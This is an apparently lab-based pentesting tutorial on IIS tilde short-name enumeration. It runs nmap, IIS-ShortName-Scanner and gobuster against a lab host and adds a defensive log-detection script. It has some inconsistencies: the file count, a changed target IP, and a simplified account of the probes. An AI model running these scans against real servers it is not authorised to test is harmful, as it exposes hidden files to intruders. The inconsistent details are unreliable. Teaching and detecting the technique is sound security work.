
Pentesting Microsoft Internet Information Services (IIS)

IIS tilde directory enumeration

IIS tilde directory enumeration is a technique utilised to uncover hidden files, directories, and short file names (aka the 8.3 format) on some versions of Microsoft Internet Information Services (IIS) web servers. This method takes advantage of a specific vulnerability in IIS, resulting from how it manages short file names within its directories.

When a file or folder is created on an IIS server, Windows generates a short file name in the 8.3 format, consisting of eight characters for the file name, a period, and three characters for the extension. Intriguingly, these short file names can grant access to their corresponding files and folders, even if they were meant to be hidden or inaccessible.

The tilde (~) character, followed by a sequence number, signifies a short file name in a URL. Hence, if someone determines a file or folder's short file name, they can exploit the tilde character and the short file name in the URL to access sensitive data or hidden resources.

The attack

Assume the server contains a hidden directory named SecretDocuments. When a request is sent to http://example.com/~s, the server replies with a 200 OK status code, revealing a directory whose short name begins with "s". If no such name exists, it returns a different status code. The useful part is that the name can be guessed one character at a time: a 200 OK for the request http://example.com/~sec narrows the short name further to "sec".

Once the short name secret~1 is identified, enumeration of specific file names within that path can be performed, potentially exposing sensitive documents.
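Seen from the defender's side, the request pattern just described (a run of tilde-prefixed probes from one client, growing one character at a time, with the `/~1/.rem` suffix and OPTIONS method that the scanner output later on this page reports) stands out clearly in IIS W3C logs. The following Python is an added example for this page, not code from the original text or from IIS-ShortName-Scanner. It assumes the default IIS W3C `#Fields` header layout; the log lines, IP addresses and the probe threshold `MIN_PROBES` are constructed assumptions for illustration.

```python
"""Detect IIS 8.3 short-name (tilde) enumeration attempts in IIS W3C logs.

Added example for this page, not part of the original text or of
IIS-ShortName-Scanner. Column names come from the "#Fields" header of the
log, so the parser is independent of the exact field order a site logs.
"""
import re
from collections import defaultdict

# Constructed sample log (10.0.0.5 = server, 203.0.113.9 = probing client,
# 198.51.100.7 = ordinary visitor). Not a real capture; addresses are from
# documentation ranges.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 7.5
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status time-taken
2025-05-18 20:03:06 10.0.0.5 GET /index.aspx - 80 - 198.51.100.7 Mozilla/5.0 200 0 0 15
2025-05-18 20:03:06 10.0.0.5 OPTIONS /~1/.rem - 80 - 203.0.113.9 Java/17 404 0 2 1
2025-05-18 20:03:06 10.0.0.5 OPTIONS /~a - 80 - 203.0.113.9 Java/17 404 0 2 1
2025-05-18 20:03:07 10.0.0.5 OPTIONS /~s - 80 - 203.0.113.9 Java/17 200 0 0 1
2025-05-18 20:03:07 10.0.0.5 OPTIONS /~se - 80 - 203.0.113.9 Java/17 200 0 0 1
2025-05-18 20:03:07 10.0.0.5 OPTIONS /~sec - 80 - 203.0.113.9 Java/17 200 0 0 1
2025-05-18 20:03:08 10.0.0.5 OPTIONS /~sed - 80 - 203.0.113.9 Java/17 404 0 2 1
2025-05-18 20:03:08 10.0.0.5 GET /upload~1/ - 80 - 203.0.113.9 Java/17 404 0 2 1
2025-05-18 20:03:09 10.0.0.5 GET /~bob/profile - 80 - 198.51.100.7 Mozilla/5.0 200 0 0 12
"""

TILDE_SEGMENT = re.compile(r"~[A-Za-z0-9]")  # 8.3 name (UPLOAD~1) or "/~prefix" probe
MAGIC_SUFFIX = "/.rem"                         # suffix reported by the scanner output on this page
MIN_PROBES = 5                                 # assumed threshold; tune per site


def parse_w3c(text):
    """Yield one dict per record, keyed by the names in the #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#"):
            continue
        values = line.split()
        if fields is None or len(values) != len(fields):
            continue  # skip records without a header or with a bad column count
        yield dict(zip(fields, values))


def is_short_name_probe(stem):
    """True if a URI stem looks like an 8.3 short-name probe."""
    if stem.endswith(MAGIC_SUFFIX):
        return True
    return any(TILDE_SEGMENT.search(seg) for seg in stem.split("/"))


def find_tilde_enumeration(text, min_probes=MIN_PROBES):
    """Return {client_ip: summary} for clients whose probe count reaches min_probes."""
    per_client = defaultdict(lambda: {"probes": 0, "stems": set(),
                                      "statuses": defaultdict(int), "methods": set()})
    for rec in parse_w3c(text):
        stem = rec.get("cs-uri-stem", "")
        if not is_short_name_probe(stem):
            continue
        entry = per_client[rec["c-ip"]]
        entry["probes"] += 1
        entry["stems"].add(stem)
        entry["statuses"][rec["sc-status"]] += 1
        entry["methods"].add(rec["cs-method"])

    findings = {}
    for ip, entry in per_client.items():
        if entry["probes"] >= min_probes:
            findings[ip] = {
                "probes": entry["probes"],
                "distinct_stems": len(entry["stems"]),
                "methods": sorted(entry["methods"]),
                "statuses": dict(entry["statuses"]),
            }
    return findings


if __name__ == "__main__":
    for ip, f in find_tilde_enumeration(SAMPLE_LOG).items():
        print(f"{ip}: {f['probes']} short-name probes, {f['distinct_stems']} distinct stems, "
              f"methods={f['methods']}, statuses={f['statuses']}")
```

A single tilde in a legitimate URL (the `/~bob/profile` line) stays below the threshold, while the probing client is reported with its mix of OPTIONS and GET requests and of 200 and 404 responses; the status split is worth keeping in the finding because it shows which prefixes the server confirmed.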

Enumeration

The initial phase involves mapping the target and determining which services are operating on their respective ports.

```shell-session
nmap -p- -sV -sC --open 10.129.73.154
```

IIS 7.5 is running on port 80. Executing a tilde enumeration attack on this version could be a viable option.

Tilde Enumeration using IIS ShortName Scanner

Manually sending HTTP requests for each letter of the alphabet can be a tedious process. Fortunately, there is a tool called IIS-ShortName-Scanner that can automate this task.

Download it from: https://github.com/irsdl/IIS-ShortName-Scanner

Requirements: Oracle Java. Once it is installed, clone the repository and run the scanner against the target:

```shell-session
git clone https://github.com/irsdl/IIS-ShortName-Scanner.git
cd IIS-ShortName-Scanner/release
java -jar iis_shortname_scanner.jar 0 5 http://10.129.73.154/
```

Expected output:

```shell-session
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Do you want to use proxy [Y=Yes, Anything Else=No]? 
Early result: the target is probably vulnerable.
Early result: identified letters in names > A,C,D,E,F,L,N,O,P,R,S,T,U,X
Early result: identified letters in extensions > A,C,P,S
# IIS Short Name (8.3) Scanner version 2023.4 - scan initiated 2025/05/18 20:03:06
Target: http://10.129.73.154/
|_ Result: Vulnerable!
|_ Used HTTP method: OPTIONS
|_ Suffix (magic part): /~1/.rem
|_ Extra information:
  |_ Number of sent requests: 571
  |_ Identified directories: 2
    |_ ASPNET~1
    |_ UPLOAD~1
  |_ Identified files: 2
    |_ CSASPX~1.CS
      |_ Actual extension = .CS
    |_ TRANSF~1.ASP
```

Upon executing the tool, it discovers 2 directories and 3 files. However, the target does not permit GET access to http://10.129.204.231/TRANSF~1.ASP, so the rest of the file name has to be brute-forced from a wordlist.

```shell-session
egrep -r ^transf /usr/share/wordlists/* | sed 's/^[^:]*://' > /tmp/list.txt
gobuster dir -u http://10.129.73.154/ -w /tmp/list.txt -x .aspx,.asp
```

Output:

```shell-session
transfer.aspx
```
Last update: 2025-06-01
Created: June 1, 2025 11:12:15